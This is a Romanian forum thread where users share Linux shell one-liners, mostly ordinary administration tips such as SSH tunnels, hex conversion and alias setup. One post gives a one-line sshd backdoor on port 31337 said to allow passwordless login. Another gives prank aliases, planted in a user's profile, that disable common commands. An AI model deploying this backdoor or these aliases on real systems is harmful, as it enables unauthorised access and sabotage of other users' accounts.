Jump to content
pyth0n3

A Sh0rt Line C0de

Recommended Posts

SSH Tunnel (SOCKS Proxy Forwarding)

ssh -D  8080 target_ip 

SSH Tunnel (SOCKS Proxy Forwarding) with /sbin/nologin or /sbin/false directive set

Urmatoarea linie de cod face exact ce face bitvise si putty sau oricare alt software

ssh -N -D 8080 target_ip

Disable sshd forwarding

Urmatoarea linie de cod blocheaza forwarding-ul in sshd asadar nu va mai permite crearea unui tunnel sau proxy socks

sed -i'.bak'  '/TcpForward/d' /etc/ssh/sshd_config && echo AllowTcpForwarding no >> /etc/ssh/sshd_config && kill -HUP `cat /var/run/sshd.pid`

Note:

Acum fiecare c***t de software face wrapping pe acest principiu si majoritatea din voi cred ca face miracole

Inca o data am demonstrat si sper sa inteleaga fiecare ca nologin e doar o directiva care nu permite logarea user-ului dar nu are treaba cu forwarding-ul sau cu crearea unui proxy socks .

Toate aceste directive vin setate direct in serverul ssh pe care toti ratatii il numesc in mod gresit root

Root este un simplu user care la randul lui poate avea restrictii in cazul in care vine setat initial un access control de tipul MAC

Mandatory Access Control.

Pe scurt folosind acest tip de control i se pot pune restrictii si userului root.

Se creaza regulile pentru fiecare user se incarca in sistem si se arunca cheia, asadar nimeni nu poate face mai mult decat ii vine permis initial sa faca .

Sper sa va fie cat de cat clar conceptul de baza sa nu mai intalnim errori stupide pe viitor.

Link to comment
Share on other sites

Daca vreti sa faceti misto de un regular user , punetii asta in profil si chimbati ownership cu root:root si file atribute 0600

; Usefull administration commands

alias ifconfig="echo $1 error fetching interface information: Device not found"

alias iptables="echo Try `iptables -h' or 'iptables --help' for more information."

alias w="echo -bash: w: command not found"

alias whoami="echo Un bou"

alias last="echo -bash: last: command not found"

alias netstat="echo -bash: netstat: command not found"

alias lsmod="echo -bash: lsmod: command not found"

alias insmod="echo -bash: insmod: command not found"

alias uname="echo -bash: uname: command not found"

alias su="echo -bash: su: command not found"

alias sudo="echo -bash: sudo: command not found"

; Editors

alias mc="echo -bash: mc: command not found"

alias mcedit="echo -bash: mcedit: command not found"

alias vi="echo -bash: vi: command not found"

alias pico="echo -bash: vi: command not found"

; Editors util

alias cat="echo -bash: cat: command not found"

alias awk=""echo -bash: awk: command not found"

alias grep="echo -bash: grep: command not found"

Sigur o sa ii ia un pic sa se prinda ce naiba se intampla

pyth0n3 eu zic sa te apuci sa iti scrii propriul shell , eventual bazat pe python.

  • Upvote 1
Link to comment
Share on other sites

pyth0n3 eu zic sa te apuci sa iti scrii propriul shell , eventual bazat pe python.

Already Done!

IPython: Productive Interactive Computing

I-am aplicat cateva modificari , suporta module , functii , linii de cod scrise in python si in oricare alt shell

E cross platform si vine integrat cu orice shell , eu l-am integrat cu Korn Shell si i-am adus functii personalizate

E mai mult decat un shell , e un framework si poate fi in acelasi timp si un penetration tool , debugger, editor, webserver, ssh client, ftp ,etc .

Link to comment
Share on other sites

Convert Ascii to Hex

Character and string to escaped hex with newline C style syntax


echo word |xxd -p | sed 's/../\\x&/g;s/:$//'

Character and string to escaped hex without newline C style syntax


echo word |xxd -p | sed 's/0a/ /' | sed 's/../\\x&/g;s/:$//'

Convert Decimal to Hex

Numeric constants to escaped hex C style syntax


(echo obase=16; echo "12345")| bc | sed 's/^/0x/'

Link to comment
Share on other sites

OS:Linux

Get machine MAC

sudo ifconfig | grep -i HWaddr | awk '{print $5}'

Acesta e sistemul meu:

System : Linux

Release : 3.6.0-sabayon

Platform : Linux-3.6.0-sabayon-i686-Intel-R-_Pentium-R-_4_CPU_2.40GHz-with-gentoo-2.2

Machine : i686

iar la mine aceast? comand? nu a func?ionat. Pentru Sabayon (?i probabil, orice distro Gentoo-based) comanda este:

sudo ifconfig | grep -i ether | awk '{print $2}'

Link to comment
Share on other sites

Pentru Sabayon (?i probabil, orice distro Gentoo-based) comanda este:

sudo ifconfig | grep -i ether | awk '{print $2}'

Pentru orice linux:

ifconfig eth0 | sed -ne 's/.*\(..:..:..:..:..:..\).*/\1/p'

Nota: merge chiar si la FreeBSD (doar ca nu ai eth0 acolo).

Edited by aelius
Link to comment
Share on other sites

O adaugare la postul lui Flubber :

Folosirea alias pentru treburi extrem de repetitive precum compilarea programelor usoare :

1. Faci un fisier compile.py in acelasi directory cu sursele in care pui comanda gcc deci ceva de genul :


import os
os.system('g++ one.cpp two.cpp three.cpp main.cpp -lfirstlib -lsecondlib')

2. Creezi aliasurile :


alias cc='rm -f a.out;compile 2>&1 | sed /Compilation/s//`printf "\33[36mCompilation\033[0m"`/'
alias compile='/usr/bin/time -f "Compilation finished in %E" python compile.py'

Si iese asta : oCXgjhR.png

Aliasurile ajuta foarte mult si pentru lucruri foarte scurte precum 'apt-cache search' .. cand cauti cate 20 de librarii intr-un timp scurt ajuta mult sa ai un "alias s='apt-cache search' " s.a.m.d

Eu folosesc multe alias-uri asa ca le salvez cu

 alias savealias='alias > ~/alias' 

si le incarc cu

 source ~/alias 

Configuratie simpla screen :

Salvezi in ~/.screenrc urmatoarele :


vbell off # Scapi de enervantul visual bell din mysql sau alte aplicatii de genul
altscreen on # Nu se salveaza output-ul din aplicatii precum vim
termcapinfo xterm ti@:te@ # Se salveaza tot output-ul din screen in terminal ( nu mai e limitat doar la cate linii are fereastra

Configuratie simpla vim :

Pentru culori mai de doamne ajuta trebuie sa modificati setarile din putty : la Connection -> Data -> Terminal-type string puneti xterm-256color

~/.vimrc


set t_Co=256 " Use 256 colors
colorscheme molokai " Use theme molokai
set mouse=a " mouse scroll in putty, pentru copy si paste trebuie sa folositi <Shift> + Left/Right click
syntax on
set ruler
set hlsearch

Pentru tema molokai :


mkdir -p ~/.vim/colors/
wget -O ~/.vim/colors/molokai.vim http://www.vim.org/scripts/download_script.php?src_id=9750

Edited by phreak
Link to comment
Share on other sites

extrage ip-uri dintr-un fisier

grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' file

extrage email-uri dintr-un fisier

grep -o '[^:]*@[^:]*' file.txt

sorteaza ip si elimina duplicat

 cat   ip  | sort | uniq

for ip in 192.168.1.{1..255}; do ping -c 1 -t 1 $ip > /dev/null && echo “${ip} is up”; done

Edited by hate.me
  • Upvote 1
Link to comment
Share on other sites

Extrage IP-urile alocate ?i le pune într-un array, în afar? de 127.0.0.*. În caz c? dori?i s? v? juca?i cu propriile scripturi/paneluri de administrare poate fi util.

mapfile -t IPs < <(ifconfig | grep -o 'inet addr:[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' | grep -v "127.0.0" | awk 'BEGIN {FS=":"} {print $2}')

Le afi?a?i cu echo ${IPs[0]}

1,2,3 ?i tot a?a.

ar putea fi îmbun?t??it?, dar e ok ?i a?a.

  • Upvote 1
Link to comment
Share on other sites

simplest sshd backdoor ever.

ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337

spawns sshd backdoor on port 31337, you can login with root/bin/ftp/mail/anyuser without password*.

*backdoor pe portul 31337, se poate loga cu orice user, fara parola

Credite: /Kingcope

L.E. userul X trebuie sa fie deja logat im timp ce intram pe backdoor.

Edited by Elohim
Link to comment
Share on other sites

@Elohim: Nu m? prind de ce ai putea s? te loghezi f?r? parol?.

Am zis c? poate nu am în?eles ceva ?i am f?cut practic, de?i...

Nu te po?i loga f?r? parol?. Ai doar un daemon de ssh ascultând pe un alt port care este blocat de firewall, cel mai probabil.

Îmi scap? ceva?

Pentru ca acea comanda sa mearga, userul X trebuie sa fie logat.

Exemplu simplu :

Am intrat pe serverul lui aelius cu userul brutus, am pornit acel mic backdoor, am iesit. Vreau sa reintru, o sa pot doar daca brutus este deja logat.

Link to comment
Share on other sites

Atunci cand scrieti o comanda gresit o puteti corecta foarte usor

^stringGresit^stringCorect


vilie@swarm:~$ wgwt google.com
-bash: wgwt: command not found
vilie@swarm:~$ ^wgwt^wget
wget google.com


vilie@swarm:~$ ping google.cpm
ping: unknown host google.cpm
vilie@swarm:~$ ^cpm^com
ping google.com
PING google.com (173.194.113.14) 56(84) bytes of data.
64 bytes from fra02s19-in-f14.1e100.net (173.194.113.14): icmp_req=1 ttl=48 time=37.7 ms

Link to comment
Share on other sites

Gasire proces ce papa mult RAM dupa nume, terminare + log:

Se inlocuie !!NAME!! cu ce aveti nevoie.

Este folositor cand stiti ca un anumit proces mananca mult, si vreti sa il inchideti automat.

Se face CRON pe fisier si se rezolva.

Sper ca ajuta pe cineva, mie mi-a fost de folos.


#! /bin/bash
# Author : zekStein++ ( Adrian Constantin # b3kwz@yahoo.com )

iMaxUsage=512000 #This is the maximum memory usage permited !

#Here we took all the pids of the running processes

iPids=$( ps -U root -u root -N | grep !!NAME!! | grep -o -P "(.*)(?=pts)");

#Here we parse the PIDS and search for HIGH MEMORY USAGE !

for i in $iPids
do

#Here we check all the usages for that PIDS !

iMemoryUsage=$( pmap $i | awk -F"total" '{print $2}' | grep K | tr -d " " | tr -d "K" );

#Here we will compare with the maximum MEMORY USAGE PERMITED!
#Also, we kill the process and log it to know at any time who was the joker .

if [ $iMemoryUsage -gt $iMaxUsage ]
then

sPidOwner=$(ps -ef | grep $i | grep -o -P '(.*)(?=$i)' | cut -d"r" -f1 | grep " "); # Unstable.
sDateAndTime=$(date)
kill $i
echo "Data si ora : $sDateAndTime , utilizator : $sPidOwner ;" >> /home/InformatiiConsumRam.log

fi

done

#Script job done !

Edited by zekstein
Link to comment
Share on other sites

Uneori ave?i aliasuri dar nu le pute?i rula ca root.

Trebuie s? pune?i in .bashrc

alias sudo="sudo "

De exemplu.


ubuntu@ubuntu-stuff:~$ alias u
alias u='uname -a; w'
ubuntu@ubuntu-stuff:~$ u
Linux ubuntu-stuff 3.13.0-29-generic #53-Ubuntu SMP Wed Jun 4 21:00:20 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
19:26:30 up 41 days, 8:31, 2 users, load average: 0.01, 0.19, 0.18
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ubuntu pts/0 10.42.0.2 19:24 6.00s 0.14s 0.00s w
ubuntu@ubuntu-stuff:~$ sudo u
sudo: u: command not found
ubuntu@ubuntu-stuff:~$ alias sudo="sudo "
ubuntu@ubuntu-stuff:~$ sudo u
Linux ubuntu-stuff 3.13.0-29-generic #53-Ubuntu SMP Wed Jun 4 21:00:20 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
19:26:41 up 41 days, 8:31, 2 users, load average: 0.01, 0.18, 0.18
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ubuntu pts/0 10.42.0.2 19:24 1.00s 0.14s 0.00s w

Link to comment
Share on other sites

Gasire proces ce papa mult RAM dupa nume, terminare + log:

Se inlocuie !!NAME!! cu ce aveti nevoie.

Este folositor cand stiti ca un anumit proces mananca mult, si vreti sa il inchideti automat.

Se face CRON pe fisier si se rezolva.

Sper ca ajuta pe cineva, mie mi-a fost de folos.


#! /bin/bash
# Author : zekStein++ ( Adrian Constantin # b3kwz@yahoo.com )

iMaxUsage=512000 #This is the maximum memory usage permited !

#Here we took all the pids of the running processes

iPids=$( ps -U root -u root -N | grep !!NAME!! | grep -o -P "(.*)(?=pts)");

#Here we parse the PIDS and search for HIGH MEMORY USAGE !

for i in $iPids
do

#Here we check all the usages for that PIDS !

iMemoryUsage=$( pmap $i | awk -F"total" '{print $2}' | grep K | tr -d " " | tr -d "K" );

#Here we will compare with the maximum MEMORY USAGE PERMITED!
#Also, we kill the process and log it to know at any time who was the joker .

if [ $iMemoryUsage -gt $iMaxUsage ]
then

sPidOwner=$(ps -ef | grep $i | grep -o -P '(.*)(?=$i)' | cut -d"r" -f1 | grep " "); # Unstable.
sDateAndTime=$(date)
kill $i
echo "Data si ora : $sDateAndTime , utilizator : $sPidOwner ;" >> /home/InformatiiConsumRam.log

fi

done

#Script job done !

eu il caut cu top si dupa aia omor procesul cu kill, ceva in genul asta:

top | grep nume_program

kill PID_de_program

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...